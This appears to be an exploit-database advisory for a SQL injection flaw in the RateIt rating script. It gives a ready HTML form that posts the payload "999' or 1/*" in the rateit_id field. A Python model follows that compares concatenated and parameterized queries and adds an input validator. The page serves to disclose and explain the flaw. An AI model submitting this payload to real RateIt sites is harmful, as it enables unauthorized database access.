PoC/Exploit for SQL Injection Vulnerability in RateIt

Published Proof of Concept code - SQL Injection Vulnerability in RateIt.

Description: Available
Solution: Not available - check vendor's website

SQL Injection Example:

<form action="http://[host]/rate/index.php" method="post">
<input name="rate" value="x">
<input name="rateit_id" value="999' or 1/*">
<input name="hotscript_id" value="12345">
<input name="postedcounter" value="1">
<input name="action" value="doit">
<input type="submit" value="Rate!">
</form>
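
The `rateit_id` field in the form above carries the injected value. The following Python model is an added example, not RateIt's code and not part of the advisory: it runs that same value through a concatenated query and through a bound-parameter query. The `ratings` table, its columns, the function names and the use of SQLite in place of the application's own database are assumptions made for illustration.

```python
import sqlite3

def make_db():
    # Constructed sample data; table and column names are assumptions,
    # not RateIt's real schema.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE ratings (rateit_id TEXT, votes INTEGER)")
    db.executemany("INSERT INTO ratings VALUES (?, ?)",
                   [("1", 10), ("2", 4), ("3", 7)])
    return db

def lookup_concatenated(db, rateit_id):
    """Vulnerable pattern: the POST value is pasted into the SQL text."""
    sql = ("SELECT rateit_id FROM ratings WHERE rateit_id = '"
           + rateit_id + "'")
    return [row[0] for row in db.execute(sql)]

def lookup_parameterized(db, rateit_id):
    """Hardened pattern: the value is bound and never parsed as SQL."""
    sql = "SELECT rateit_id FROM ratings WHERE rateit_id = ?"
    return [row[0] for row in db.execute(sql, (rateit_id,))]

def validate_rateit_id(value):
    """Allow-list check to apply before any query: digits only."""
    if not (value.isascii() and value.isdigit() and len(value) <= 10):
        raise ValueError("rateit_id must be numeric")
    return int(value)

if __name__ == "__main__":
    db = make_db()
    posted = "999' or 1/*"  # value of rateit_id in the form on this page
    # The quote closes the string literal, "or 1" makes the WHERE clause
    # true for every row, and "/*" comments out the trailing quote.
    print("concatenated: ", lookup_concatenated(db, posted))
    # Bound as data, the same value matches no row.
    print("parameterized:", lookup_parameterized(db, posted))
    try:
        validate_rateit_id(posted)
    except ValueError as err:
        print("rejected:", err)
```
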
